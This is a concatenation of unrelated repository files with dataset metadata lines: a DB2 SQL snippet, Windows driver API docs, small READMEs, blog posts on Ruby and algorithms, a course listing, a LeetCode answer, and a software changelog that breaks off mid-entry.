NEWID UNIQUE(EMPNO,HIREDATE) ``` ### Reorg ```sql CALL SYSPROC.ADMIN_CMD('reorg table es.esw#act_info'); ``` ### Annotations Example 1: Add a comment for the EMPLOYEE table. ```sql COMMENT ON TABLE EMPLOYEE IS 'Reflects first quarter reorganization' ``` Example 2: Add a comment for the EMP_VIEW1 view. ```sql COMMENT ON TABLE EMP_VIEW1 IS 'View of the EMPLOYEE table without salary information'copy to clipboard ``` Example 3: Add a comment for the EDLEVEL column of the EMPLOYEE table. ```sql COMMENT ON COLUMN EMPLOYEE.EDLEVEL IS 'highest grade level passed in school'copy to clipboard ``` Example 4: Add comments for two different columns of the EMPLOYEE table. ```sql COMMENT ON EMPLOYEE (WORKDEPT IS 'see DEPARTMENT table for names', EDLEVEL IS 'highest grade level passed in school' ) ``` ### Get Indexes ```sql SELECT tabname,indname,colnames,indschema,lastused,owner FROM SYSCAT.indexes WHERE tabschema = 'ES' ORDER BY 1,2 ```
19.381188
121
0.702937
yue_Hant
0.776134
4bec6d3bcd6e1380382b085401a6bb7a13b5fc66
4,869
md
Markdown
wdk-ddi-src/content/wdffdo/nc-wdffdo-evt_wdf_device_remove_added_resources.md
henke37/windows-driver-docs-ddi
787885908a0474b7e2c3d2f8a47355dee62c7aec
[ "CC-BY-4.0", "MIT" ]
1
2021-08-16T13:05:36.000Z
2021-08-16T13:05:36.000Z
wdk-ddi-src/content/wdffdo/nc-wdffdo-evt_wdf_device_remove_added_resources.md
henke37/windows-driver-docs-ddi
787885908a0474b7e2c3d2f8a47355dee62c7aec
[ "CC-BY-4.0", "MIT" ]
null
null
null
wdk-ddi-src/content/wdffdo/nc-wdffdo-evt_wdf_device_remove_added_resources.md
henke37/windows-driver-docs-ddi
787885908a0474b7e2c3d2f8a47355dee62c7aec
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- UID: NC:wdffdo.EVT_WDF_DEVICE_REMOVE_ADDED_RESOURCES title: EVT_WDF_DEVICE_REMOVE_ADDED_RESOURCES (wdffdo.h) description: A driver's EvtDeviceRemoveAddedResources event callback function removes hardware resources that the driver's EvtDeviceFilterAddResourceRequirements callback function added. old-location: wdf\evtdeviceremoveaddedresources.htm tech.root: wdf ms.date: 02/26/2018 keywords: ["EVT_WDF_DEVICE_REMOVE_ADDED_RESOURCES callback function"] ms.keywords: DFDeviceObjectFdoPdoRef_c1020fff-8895-4ece-ae27-ef33d3a65de6.xml, EVT_WDF_DEVICE_REMOVE_ADDED_RESOURCES, EVT_WDF_DEVICE_REMOVE_ADDED_RESOURCES callback, EvtDeviceRemoveAddedResources, EvtDeviceRemoveAddedResources callback function, kmdf.evtdeviceremoveaddedresources, wdf.evtdeviceremoveaddedresources, wdffdo/EvtDeviceRemoveAddedResources req.header: wdffdo.h req.include-header: Wdf.h req.target-type: Universal req.target-min-winverclnt: req.target-min-winversvr: req.kmdf-ver: 1.0 req.umdf-ver: req.ddi-compliance: req.unicode-ansi: req.idl: req.max-support: req.namespace: req.assembly: req.type-library: req.lib: req.dll: req.irql: PASSIVE_LEVEL targetos: Windows req.typenames: f1_keywords: - EVT_WDF_DEVICE_REMOVE_ADDED_RESOURCES - wdffdo/EVT_WDF_DEVICE_REMOVE_ADDED_RESOURCES topic_type: - APIRef - kbSyntax api_type: - UserDefined api_location: - Wdffdo.h api_name: - EvtDeviceRemoveAddedResources --- # EVT_WDF_DEVICE_REMOVE_ADDED_RESOURCES callback function ## -description <p class="CCE_Message">[Applies to KMDF only]</p> A driver's <i>EvtDeviceRemoveAddedResources</i> event callback function removes hardware resources that the driver's <a href="/windows-hardware/drivers/ddi/wdffdo/nc-wdffdo-evt_wdf_device_filter_resource_requirements">EvtDeviceFilterAddResourceRequirements</a> callback function added. ## -parameters ### -param Device [in] A handle to the framework device object to which resources will be assigned. ### -param ResourcesRaw [in] A handle to a resource list object that identifies the raw hardware resources that the PnP manager has assigned to the device. ### -param ResourcesTranslated [in] A handle to a resource list object that identifies the translated hardware resources that the PnP manager has assigned to the device. ## -returns If the driver encountered no errors it must return STATUS_SUCCESS. Otherwise it must return an NTSTATUS value that <a href="/windows-hardware/drivers/kernel/using-ntstatus-values">NT_SUCCESS</a> evaluates as <b>FALSE</b>. For more information about return values, see <a href="/windows-hardware/drivers/wdf/reporting-device-failures">Reporting Device Failures</a>. ## -remarks Framework-based function drivers can provide an <i>EvtDeviceRemoveAddedResources</i> callback function. To register this callback function, drivers call <a href="/windows-hardware/drivers/ddi/wdffdo/nf-wdffdo-wdffdoinitseteventcallbacks">WdfFdoInitSetEventCallbacks</a>. If a driver provides an <a href="/windows-hardware/drivers/ddi/wdffdo/nc-wdffdo-evt_wdf_device_filter_resource_requirements">EvtDeviceFilterAddResourceRequirements</a> callback function that adds resources to a device's hardware requirements list, the driver must also provide an <i>EvtDeviceRemoveAddedResources</i> callback function. The <i>EvtDeviceRemoveAddedResources</i> callback function examines the resource list that the PnP manager has assigned to the device, and removes the resources from the list that the <i>EvtDeviceFilterAddResourceRequirements</i> callback function added. If the driver removes a resource, it must remove it from both the raw and translated resource lists. For more information about resource lists and the order in which the resources appear, see <a href="/windows-hardware/drivers/wdf/raw-and-translated-resources">raw and translated hardware resources</a>. The framework calls the driver's <i>EvtDeviceRemoveAddedResources</i> callback function immediately before it passes the device's resource list to the bus driver. This callback function removes added resources so that the bus driver will not attempt to use them. For more information about the <i>EvtDeviceRemoveAddedResources</i> callback function, see <a href="/windows-hardware/drivers/wdf/modifying-a-resource-list">Modifying a Resource List</a>. For more information about hardware resources, see <a href="/windows-hardware/drivers/wdf/hardware-resources-for-kmdf-drivers">Hardware Resources for Framework-Based Drivers</a>. ## -see-also <a href="/windows-hardware/drivers/ddi/wdffdo/nc-wdffdo-evt_wdf_device_filter_resource_requirements">EvtDeviceFilterAddResourceRequirements</a> <a href="/windows-hardware/drivers/ddi/wdffdo/nc-wdffdo-evt_wdf_device_filter_resource_requirements">EvtDeviceFilterRemoveResourceRequirements</a>
50.71875
692
0.805299
eng_Latn
0.554346
4bedc8381ebf2e64a1ab971fbe2508b8c9150073
260
md
Markdown
css/event/readme.md
mystery66/cjk_full_stack
d62c1accddc119b7dd9877a7d167d86d545a6375
[ "MIT" ]
4
2018-06-08T06:52:24.000Z
2021-02-22T03:24:22.000Z
css/event/readme.md
mystery66/cjk_full_stack
d62c1accddc119b7dd9877a7d167d86d545a6375
[ "MIT" ]
null
null
null
css/event/readme.md
mystery66/cjk_full_stack
d62c1accddc119b7dd9877a7d167d86d545a6375
[ "MIT" ]
null
null
null
1 PC px markman 2 文档流, 栅格系统 网格比例, bootstrap 12列 col-md-? 3 链接 详情页, 点图片 a href /detail target="_blank" 地图图片 map.baidu.com 4 内容 格式比较工整, 左边标题, 右边内容, table 公共的样式, font-size color 类名 绿色的文字, g_color 类 btn bootstrap primary vertical-align middle
8.965517
30
0.696154
yue_Hant
0.267612
4beddcd54d7ee87ff494fb656714db3ef72123e6
153
md
Markdown
_pages/blog.md
abbyruthe/abbyruthe.github.io
6305df7195af63f8762d95d407407a342a8a9253
[ "MIT" ]
null
null
null
_pages/blog.md
abbyruthe/abbyruthe.github.io
6305df7195af63f8762d95d407407a342a8a9253
[ "MIT" ]
null
null
null
_pages/blog.md
abbyruthe/abbyruthe.github.io
6305df7195af63f8762d95d407407a342a8a9253
[ "MIT" ]
null
null
null
--- layout: archive title: "Blog" permalink: /blog/ author_profile: true redirect_from: - /resume --- {% include base_path %} More to follow shortly.
12.75
23
0.699346
eng_Latn
0.950625
4beeba1faf901a631c4d9094fe8abd9d1b955816
1,524
md
Markdown
examples/example.js/north-star/README.md
odys-z/jclient
11e71030c8535cd06bf45eb1189553b06048a1f0
[ "Apache-2.0" ]
null
null
null
examples/example.js/north-star/README.md
odys-z/jclient
11e71030c8535cd06bf45eb1189553b06048a1f0
[ "Apache-2.0" ]
null
null
null
examples/example.js/north-star/README.md
odys-z/jclient
11e71030c8535cd06bf45eb1189553b06048a1f0
[ "Apache-2.0" ]
null
null
null
# About A sample app that can be used for start up new app developement. v1.0 (docker image 0.6.1): Works with docker image odysz/connect-polestar:0.6.1. # quick start To deploy this on your server, make sure the server is docker enabled. Then upload & extract emr-0.1.0.zip on to a server with docker installed, and follow this steps: 1. change /dist/private/host.json, replace your server IP like this: host: http://[your-server-ip]:8080/connects 2. execute these two scripts command: ``` ./docker-start ./docker-webstart ``` To use the data server with docker image, ***odysz/connect-polestar*** wich is available at docker hub. The server side docker image must work with these two [sqlite3 db file](./polestar-docker/volume/polestar.zip) - put it in the volume configured for the docker container. 3. check both of your docker containers are runing: ``` docker ps ``` Please note there are totally 2 containers runing, one for web pages, one for json data service. # start from source This folder is the source of North Start, the example project. There issue of invalid hook makes the test project in trouble linking the lib. So to run this example from source, it's needed to install React manually:: ``` npm install react react-dom npm install @anclient/anreact @anclient/semantier ``` # Release Log - v0.6.1 docker image: ``` odysz/connect-polestar:0.6.1 odysz/emr-web:0.6.1 ``` Volume's db files, north.sqlite & systme.sqlite can be found in polestar-docker/volume.
23.8125
90
0.734908
eng_Latn
0.985239
4beec8e6901822ecd53596c9af6140bd7e448817
1,972
md
Markdown
_posts/2021-10-25-difference-between-p-puts-and-return.md
kon-ham/kon-ham.github.io
7fb723506b87c224acf51870a63dfa03a7f54ad5
[ "MIT" ]
null
null
null
_posts/2021-10-25-difference-between-p-puts-and-return.md
kon-ham/kon-ham.github.io
7fb723506b87c224acf51870a63dfa03a7f54ad5
[ "MIT" ]
null
null
null
_posts/2021-10-25-difference-between-p-puts-and-return.md
kon-ham/kon-ham.github.io
7fb723506b87c224acf51870a63dfa03a7f54ad5
[ "MIT" ]
1
2022-01-18T17:41:50.000Z
2022-01-18T17:41:50.000Z
--- layout: post title: The (Super Short) Difference Between P, Puts, Print, and Return --- ## Using `p` * Use `p` if you need your output to look more closely to what your Ruby code looks like. ## Using `puts` * Use `puts` if you need to output your value *and* create a new line afterwards. You'll notice in the example below `puts` does not literally output values in our array example. ## Using `print` * Use `print` if you need to output your value *with no new line*. ## Using `return` * Use `return` if you need to simply return a value without indicating a need for a visible output for your value. Be advised: If your return statement is true and you have multiple lines of code or conditionals, Ruby will execute the first `return` statement that is true. We can sometimes think of `return` statements as being useful for executing edge cases. Here's an example of an output: ``` # Defining our array variable irb(main):001:0> array = ["chicken", "butt", " ", nil, 9001] => ["chicken", "butt", " ", nil, 9001] # Using p irb(main):002:0> p array ["chicken", "butt", " ", nil, 9001] # Your output using p => ["chicken", "butt", " ", nil, 9001] # Using puts irb(main):003:0> puts array # Your output using puts chicken butt 9001 => nil # Using print irb(main):004:0> print array # Your output using print ["chicken", "butt", " ", nil, 9001]=> nil ``` ## Still Confused? I would encourage you not to worry about it. You'll get more solid on your understanding when you have a need for it on a case-by-case basis. What's really important to know between all of these methods is that they're *similar* but *not the same*. ## Was this helpful? I may have gotten some information incorrect or my grammar might be hard to read. Please let me know. Contact me at [info.konham@gmail.com](mailto:info.konham@gmail.com) or [contact@konkham.com](mailto:contact@konkham.com)
34
362
0.682556
eng_Latn
0.996247
4beefbf952db18ca8b0e853dd74a155439b21834
2,055
markdown
Markdown
_posts/2020-01-17-algorithm_GenomicRangeQuery.markdown
tmtmaj/tmtmaj.github.io
c061ec66d8527429e25e7eda89520d814a6c1d49
[ "MIT" ]
null
null
null
_posts/2020-01-17-algorithm_GenomicRangeQuery.markdown
tmtmaj/tmtmaj.github.io
c061ec66d8527429e25e7eda89520d814a6c1d49
[ "MIT" ]
null
null
null
_posts/2020-01-17-algorithm_GenomicRangeQuery.markdown
tmtmaj/tmtmaj.github.io
c061ec66d8527429e25e7eda89520d814a6c1d49
[ "MIT" ]
null
null
null
--- title: "[Algorithm] GenomicRangeQuery" layout: post author: Jeonghyeok Park categories: Algorithm tags: Algorithm ---  [[Codility] [GenomicRangeQuery]](https://app.codility.com/programmers/lessons/5-prefix_sums/genomic_range_query/) [Code] ``` # you can write to stdout for debugging purposes, e.g. # print("this is a debug message") def solution(S, P, Q): # write your code in Python 3.6 # print(S, P, Q) cost_dict = {'A':1, 'C':2, 'G':3, 'T':4} curr_counts = [0,0,0,0] counts = [curr_counts[:]] for s in S: curr_counts[cost_dict[s]-1] += 1 counts.append(curr_counts[:]) # print(counts) results = [] for i in range(len(Q)): counts_q = counts[Q[i] + 1] counts_p = counts[P[i]] if Q[i] == P[i]: results.append(cost_dict[S[Q[i]]]) elif counts_q[0] > counts_p[0]: results.append(1) elif counts_q[1] > counts_p[1]: results.append(2) elif counts_q[2] > counts_p[2]: results.append(3) elif counts_q[3] > counts_p[3]: results.append(4) return results # # OK 하지만 이해가 잘안됌 어디가 되는거지.. # result = [] # for i in range(len(P)): # if 'A' in S[P[i]:Q[i]+1]: # result.append(1) # elif 'C' in S[P[i]:Q[i]+1]: # result.append(2) # elif 'G' in S[P[i]:Q[i]+1]: # result.append(3) # else: # result.append(4) # return result # fac_dict = {'A':1, 'C':2, 'G':3, 'T':4} # S_int = [fac_dict[i] for i in S] # result = [] # # time error # for p, q in zip(P, Q): # if 1 in S_int[p:q+1]: # result.append(1) # elif 2 in S_int[p:q+1]: # result.append(2) # elif 3 in S_int[p:q+1]: # result.append(3) # else: # result.append(4) # return result # # time error # for p, q in zip(P, Q): # result.append(min(S_int[p:q+1])) # return result pass ```
21.861702
113
0.50365
eng_Latn
0.478653
4befa14467c0989c60dcd061b11f17041028d304
976
md
Markdown
_posts/2020-05-01-sta399.md
utm-mcs-courses/utm-mcs-courses.github.io
ca35056a8732f5c2931372041e52288d8e1a0a1d
[ "MIT" ]
null
null
null
_posts/2020-05-01-sta399.md
utm-mcs-courses/utm-mcs-courses.github.io
ca35056a8732f5c2931372041e52288d8e1a0a1d
[ "MIT" ]
null
null
null
_posts/2020-05-01-sta399.md
utm-mcs-courses/utm-mcs-courses.github.io
ca35056a8732f5c2931372041e52288d8e1a0a1d
[ "MIT" ]
null
null
null
--- layout: course-post title: STA399Y5 - Research Opportunity Program tags: [stats] image: '' prereq: Permission of instructor and department. coreq: STA302H5/STA302H1 dist: [SCI] hours: [] excl: rec-prep: --- This course provides a richly rewarding opportunity for students in their second year to work in the research project of a professor in return for 299Y course credit. Students enrolled have an opportunity to become involved in original research, learn research methods and share in the excitement and discovery of acquiring new knowledge. Participating faculty members post their project descriptions for the following summer and fall/winter sessions in early February and students are invited to apply in early March. See <a href="calendar_detail2.pl?Topic=Experiential and International Opportunities">Experiential and International Opportunities</a> for more details. **Priority is given to students enrolled in Statistics Specialist or Major programs.**
65.066667
761
0.806352
eng_Latn
0.998058
4beff69bc06228132ca8430dd3dc4f1fe867e956
883
md
Markdown
QA/ThirdMaximumNumber.md
CW0149/leetcode-easy
5ffbbcadd5526a4b1c54f166f206e78e1a1843e6
[ "RSA-MD" ]
null
null
null
QA/ThirdMaximumNumber.md
CW0149/leetcode-easy
5ffbbcadd5526a4b1c54f166f206e78e1a1843e6
[ "RSA-MD" ]
null
null
null
QA/ThirdMaximumNumber.md
CW0149/leetcode-easy
5ffbbcadd5526a4b1c54f166f206e78e1a1843e6
[ "RSA-MD" ]
null
null
null
# [第三大的数](https://leetcode-cn.com/problems/third-maximum-number) ### 问题 给定一个非空数组,返回此数组中第三大的数。如果不存在,则返回数组中最大的数。要求算法时间复杂度必须是O(n)。 示例 1: ``` 输入: [3, 2, 1] 输出: 1 解释: 第三大的数是 1. ``` 示例 2: ``` 输入: [1, 2] 输出: 2 解释: 第三大的数不存在, 所以返回最大的数 2 . ``` 示例 3: ``` 输入: [2, 2, 3, 1] 输出: 1 解释: 注意,要求返回第三大的数,是指第三大且唯一出现的数。 存在两个值为2的数,它们都排第二。 ``` ### 解答 ``` /** * @param {number[]} nums * @return {number} */ <!-- 想象一个漏斗 --> var thirdMax = function(nums) { var b1, b2, b3; for (var i = 0; i < nums.length; i += 1) { if (!(nums[i] <= b1)) { // 漏下小于或等于b1的数 b3 = b2; b2 = b1; b1 = nums[i]; } else if (!(nums[i] <= b2) && (nums[i] !== b1)) { b3 = b2; b2 = nums[i]; } else if (!(nums[i] <= b3) && (nums[i] !== b2) && (nums[i] !== b1)) { b3 = nums[i]; } } return isNaN(b3) ? b1 : b3; }; ```
14.966102
78
0.458664
yue_Hant
0.279061
4bf115149d74b336e968c68ebdfe85ea791d275b
2,430
md
Markdown
init/README.md
KAfable/mission-control-be
6500a93cf429949c0513804ffdb1f498d9fc0125
[ "MIT" ]
1
2020-01-23T14:47:04.000Z
2020-01-23T14:47:04.000Z
init/README.md
KAfable/mission-control-be
6500a93cf429949c0513804ffdb1f498d9fc0125
[ "MIT" ]
1
2020-04-07T13:14:02.000Z
2020-04-20T20:17:36.000Z
init/README.md
KAfable/mission-control-be
6500a93cf429949c0513804ffdb1f498d9fc0125
[ "MIT" ]
1
2020-10-08T18:24:27.000Z
2020-10-08T18:24:27.000Z
## Mission Control Initialization scripts A series of scripts to initialize a dev environment for the Mission Control project. Installs docker & docker-compose as well as the Prisma CLI, sources environment variables, and spins up an instance of the Prismatopia backend for Mission Control. A valid .env configuration file and the Mission Control repository are required for these scripts to be of any use besides installing Docker and the Prisma CLI on your machine. Please note that this is not a replacement for manually managing you dev environment and is intended only to initialize the project for the first time. See the [Mission Control Backend](../README.md) documentation for instructions regarding the management of your Docker containers, in addition to Prisma deployments & seeds. ## Getting started: #### Assumptions: The following `.env` file is required in the root directory of the Mission Control repository: ``` OAUTH_TOKEN_ENDPOINT OAUTH_CLIENT_ID APPLICATION_NAME ENVIRONMENT_NAME TEST_OAUTH_CLIENT_ID TEST_OAUTH_CLIENT_SECRET PRISMA_MANAGEMENT_API_SECRET PRISMA_ENDPOINT PRISMA_SECRET ``` - The deployment script assumes that you have selected YES to globally install the Prisma CLI in order to deploy & seed the database. - The deployment script assumes that you have selected YES to manage Docker as a user and you have refreshed your groups prior to deploying the containers. You may either logout or run `su -l $USER` & `logout` to refresh your groups. #### Linux + MacOS 1. Clone the Mission Control repo, which contains these init scripts. 2. Ensure you have a valid `.env` in the Mission Control root directory. ```bash cd init && make ``` 3. Select your OS [MacOS, Arch (& Arch-derived), Ubuntu, Debian, CentOS, Fedora] 4. Follow the on-screen prompts to install required dependencies 5. Once you have verified that Docker is running, run `cd init && make` again and select `Deploy Mission Control` to spin up the containers. #### Windows: - Message Kevin on Slack #### Contributors / Testers: Special thanks to [ElijahMcKay](https://github.com/ElijahMcKay), [fresocodes](https://github.com/frescocodes), [karl2365](https://github.com/karl2365), & [judson00](https://github.com/judson00) for their help with testing! --- The Ubuntu / Debian / CentOS / Fedora installation uses the `get.docker.com` install script which can be found [here](https://github.com/docker/docker-install).
45
340
0.780658
eng_Latn
0.97875
4bf2434de9b3dad14967d3f0e9b0fce012367cb1
1,485
md
Markdown
README.md
UKHomeOffice/docker-openjdk11
360ee8500f3437aa41359276062949137c9ec22d
[ "MIT" ]
null
null
null
README.md
UKHomeOffice/docker-openjdk11
360ee8500f3437aa41359276062949137c9ec22d
[ "MIT" ]
null
null
null
README.md
UKHomeOffice/docker-openjdk11
360ee8500f3437aa41359276062949137c9ec22d
[ "MIT" ]
1
2021-04-11T09:13:42.000Z
2021-04-11T09:13:42.000Z
# Docker Java JDK Container **Deprecation notice: This repo is no longer maintained by ACP. You’re welcome to fork it according to your own needs.** Docker container that also includes Open Java 11 *JDK* install for running containerized builds. ## Getting Started These instructions will cover usage information and for the docker container ### Prerequisites In order to run this container you'll need docker installed. * [Windows](https://docs.docker.com/windows/started) * [OS X](https://docs.docker.com/mac/started/) * [Linux](https://docs.docker.com/linux/started/) ## Contributing Feel free to submit pull requests and issues. If it's a particularly large PR, you may wish to discuss it in an issue first. Please note that this project is released with a [Contributor Code of Conduct](code_of_conduct.md). By participating in this project you agree to abide by its terms. ## Versioning We use [SemVer](http://semver.org/) for versioning. For the versions available, see the [tags on this repository](https://github.com/UKHomeOffice/docker-openjdk8/tags). ## Authors * **Lewis Marshall** - *Initial work* - [Lewis Marshall](https://github.com/LewisMarshall) See also the list of [contributors](https://github.com/UKHomeOffice/docker-openjdk11/contributors) who participated in this project. ## License This project is licensed under the MIT License - see the [LICENSE.md](LICENSE.md) file for details. ## Acknowledgments * [OpenJDK11](https://jdk.java.net/11/)
32.282609
120
0.760943
eng_Latn
0.979981
4bf2f591dec2039bd324739a6d3cfd3ce35e74f9
109
md
Markdown
SourceCode/Chapter08/README.md
CoderDream/iOS-11-Swift-4-Tutorial-liuming
a1ac2b5c34ede08385567052192b058e99ef9aef
[ "MIT" ]
2
2019-09-02T06:10:08.000Z
2021-09-01T07:54:08.000Z
SourceCode/Chapter08/README.md
CoderDream/iOS-11-Swift-4-Tutorial-liuming
a1ac2b5c34ede08385567052192b058e99ef9aef
[ "MIT" ]
null
null
null
SourceCode/Chapter08/README.md
CoderDream/iOS-11-Swift-4-Tutorial-liuming
a1ac2b5c34ede08385567052192b058e99ef9aef
[ "MIT" ]
null
null
null
# 《跟着项目学iOS应用开发》的第八章实例 返回到[《跟着项目学iOS应用开发》](https://github.com/liumingl/iOS-11-Swift-4-Tutorial)一书项目源代码项目列表。
27.25
84
0.779817
kal_Latn
0.049176
48404d538837155e4d286ef8f497d992b77ca1c8
215
md
Markdown
art/README.md
powpowshen/witchcraft
7bf5a57610ce678f2bc73b58290bcbddc997c7f6
[ "MIT" ]
205
2017-08-26T03:09:09.000Z
2022-03-28T01:19:23.000Z
art/README.md
powpowshen/witchcraft
7bf5a57610ce678f2bc73b58290bcbddc997c7f6
[ "MIT" ]
45
2017-08-06T01:28:47.000Z
2022-03-08T22:19:25.000Z
art/README.md
powpowshen/witchcraft
7bf5a57610ce678f2bc73b58290bcbddc997c7f6
[ "MIT" ]
17
2018-08-06T04:08:03.000Z
2022-03-27T17:04:29.000Z
All art by Lucio Paiva done using GIMP, except `witch.svg` and `witch-hat.svg` which were kindly shared by [Freepik](https://www.flaticon.com/authors/freepik), downloaded from [Flaticon](https://www.flaticon.com).
71.666667
213
0.75814
eng_Latn
0.630321
4840c0148b73613474f9ceee3c1cdaff0849b617
11,859
md
Markdown
components/atoms/CHANGELOG.md
wakkihaya/sentrei
e72815d56b09ed57d454a3e551bac2480482fffc
[ "MIT" ]
null
null
null
components/atoms/CHANGELOG.md
wakkihaya/sentrei
e72815d56b09ed57d454a3e551bac2480482fffc
[ "MIT" ]
null
null
null
components/atoms/CHANGELOG.md
wakkihaya/sentrei
e72815d56b09ed57d454a3e551bac2480482fffc
[ "MIT" ]
null
null
null
## @sentrei/atoms [1.12.1](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.12.0...@sentrei/atoms@1.12.1) (2021-09-26) ### Performance Improvements - refactor copmonents packages ([6f43fb4](https://github.com/sentrei/sentrei/commit/6f43fb493c15eb2b37d1c8f8729d3a974e201562)) # @sentrei/atoms [1.12.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.11.0...@sentrei/atoms@1.12.0) (2021-09-25) ### Features - ini parallax ([63e51f8](https://github.com/sentrei/sentrei/commit/63e51f81ef57b40350ec3763975867ae09d15ee2)) # @sentrei/atoms [1.11.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.10.1...@sentrei/atoms@1.11.0) (2021-09-25) ### Features - add GameTextDialog molecules ([a32017a](https://github.com/sentrei/sentrei/commit/a32017a0b14c887d19f1617f1d3b08633a581400)) ## @sentrei/atoms [1.10.1](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.10.0...@sentrei/atoms@1.10.1) (2021-09-23) ### Performance Improvements - ini tsc e2d ([299f23e](https://github.com/sentrei/sentrei/commit/299f23e4bc09c199ec375ac894f3e8d6709a94be)) # @sentrei/atoms [1.10.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.9.0...@sentrei/atoms@1.10.0) (2021-09-23) ### Features - ini app mosh lol with json sort ([3bd1255](https://github.com/sentrei/sentrei/commit/3bd12550f6f1a2be250c0497c665e79e9d1ecd88)) # @sentrei/atoms [1.9.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.8.0...@sentrei/atoms@1.9.0) (2021-09-20) ### Bug Fixes - fallbacksrc in story ([b63313a](https://github.com/sentrei/sentrei/commit/b63313aa989c739f2928088f2aa6d8a58fc37a80)) - insert rest props ([32a9e63](https://github.com/sentrei/sentrei/commit/32a9e63274b4765e72a4107d9d396386d53732d1)) - jest eslint error ([9544e52](https://github.com/sentrei/sentrei/commit/9544e529f360b9d5bb9ae094e0855313990c8eab)) - manage state value from parent side ([c8133b5](https://github.com/sentrei/sentrei/commit/c8133b5234a9aa9eaae069991ed54a322c0bf2b6)) - render icons by situations ([2dd16a4](https://github.com/sentrei/sentrei/commit/2dd16a4c82eeff6828dc5e28cdb6736ce248fe64)) - story book name for text atoms ([359ac8a](https://github.com/sentrei/sentrei/commit/359ac8a3e51f80553368768b2de3ca28d426fc11)) - typo ([d4c1cf8](https://github.com/sentrei/sentrei/commit/d4c1cf862fb5023fd871363c15e54ae957768800)) - update badge export ([05cd8f6](https://github.com/sentrei/sentrei/commit/05cd8f609be48b83983649da9dd31701843c2761)) - update className for Image comp ([f8b403e](https://github.com/sentrei/sentrei/commit/f8b403e43fd9db6b8a4ef30cbc29ec202aba8c31)) - use state for managing checked value ([0135290](https://github.com/sentrei/sentrei/commit/0135290c0b96dac7e461907704319ff790d1d195)) ### Features - [wip] image atom ([6d219bf](https://github.com/sentrei/sentrei/commit/6d219bfa45b958a9733047aed2e0a48c289289a7)) - add avatar atom ([d97f44f](https://github.com/sentrei/sentrei/commit/d97f44f1e34e41d3ee7bf5eaeb915eb23b0c65af)) - add badge atoms ([77ee098](https://github.com/sentrei/sentrei/commit/77ee098c00169f7f16118f145ea03e9849aed6ee)) - add spec for image atom ([869cdad](https://github.com/sentrei/sentrei/commit/869cdadb8adb1ad8868c11ea4ffb5efee126986d)) - add toast atom ([210bcaa](https://github.com/sentrei/sentrei/commit/210bcaac2ecd137d17657f691ea1232e40c06144)) - checkbox atom ([d58159c](https://github.com/sentrei/sentrei/commit/d58159c95388835ed680a8e735288da463243b83)) - link atom ([1bdaac1](https://github.com/sentrei/sentrei/commit/1bdaac184519cefe2981db2442475b3c9b8ce993)) - spinner atom ([5e7deab](https://github.com/sentrei/sentrei/commit/5e7deab6e83c1a34766fcfe36b96c7074c0fd775)) - switch atom ([6d99faa](https://github.com/sentrei/sentrei/commit/6d99faad5879a1d3c01b1d7be05994d0d423af51)) - text atoms ([f6f79b3](https://github.com/sentrei/sentrei/commit/f6f79b376ed4a6836d1fc684b9e9e58cb7b867a6)) - update types for text atoms ([1f6adfa](https://github.com/sentrei/sentrei/commit/1f6adfa41658698fa57571b8a050719cdf1bcb73)) - wip avatar atom ([e288bc1](https://github.com/sentrei/sentrei/commit/e288bc1fbf45b9fa060047c79e88df35f85a6541)) - wip notification molecules ([ba4bea9](https://github.com/sentrei/sentrei/commit/ba4bea9e415951159cc11278b483fcd4a8e6bb91)) - wip toast atom ([5595d31](https://github.com/sentrei/sentrei/commit/5595d31f2356b8e6ef2de024f56f9c5f8f8695a3)) # @sentrei/atoms [1.8.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.7.2...@sentrei/atoms@1.8.0) (2021-08-28) ### Features - complete upgrade deps v2 ([b16b0b5](https://github.com/sentrei/sentrei/commit/b16b0b5f5a858a518669c1e9d44615a00c686431)) ## @sentrei/atoms [1.7.2](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.7.1...@sentrei/atoms@1.7.2) (2021-08-08) ### Performance Improvements - refactor select component ([73311b7](https://github.com/sentrei/sentrei/commit/73311b7affef1d7a87b2520de786ac18843ec577)) ## @sentrei/atoms [1.7.1](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.7.0...@sentrei/atoms@1.7.1) (2021-08-04) ### Performance Improvements - ini button components ([198b1eb](https://github.com/sentrei/sentrei/commit/198b1ebe0aa246ca6674e1e125754bb879f5403d)) # @sentrei/atoms [1.7.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.6.0...@sentrei/atoms@1.7.0) (2021-08-04) ### Features - ini og image ([3fccd9b](https://github.com/sentrei/sentrei/commit/3fccd9ba70ba35537f80529e1fd0b825f1d7e636)) ### Performance Improvements - refactor atoms input and select ([4358c36](https://github.com/sentrei/sentrei/commit/4358c36127fba5902f2cdc353b962df9f5caf707)) # @sentrei/atoms [1.6.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.5.0...@sentrei/atoms@1.6.0) (2021-08-03) ### Features - ini stylelint config ([c833f44](https://github.com/sentrei/sentrei/commit/c833f44225bb2b5438a29ea68bd47180da4cdd56)) ### Performance Improvements - update library layout ([1ac0f85](https://github.com/sentrei/sentrei/commit/1ac0f854b9526e480fb0b7b336db66d1952de503)) # @sentrei/atoms [1.5.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.4.2...@sentrei/atoms@1.5.0) (2021-07-26) ### Features - nx workspace revamp ([15dda56](https://github.com/sentrei/sentrei/commit/15dda56c923c7def734ddc4fe9411188c0366c1a)) ## @sentrei/atoms [1.4.2](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.4.1...@sentrei/atoms@1.4.2) (2021-07-24) ### Bug Fixes - refactor eslint config ([587591e](https://github.com/sentrei/sentrei/commit/587591e00658e6af416586c4f1689a348d5a8067)) ## @sentrei/atoms [1.4.1](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.4.0...@sentrei/atoms@1.4.1) (2021-07-24) ### Performance Improvements - configure jest files ([bbd9b78](https://github.com/sentrei/sentrei/commit/bbd9b78525a3e0b69cd98644a67e2e94160fb1d1)) # @sentrei/atoms [1.4.0](https://github.com/sentrei/sentrei/compare/@sentrei/atoms@1.3.0...@sentrei/atoms@1.4.0) (2021-07-23) ### Features - 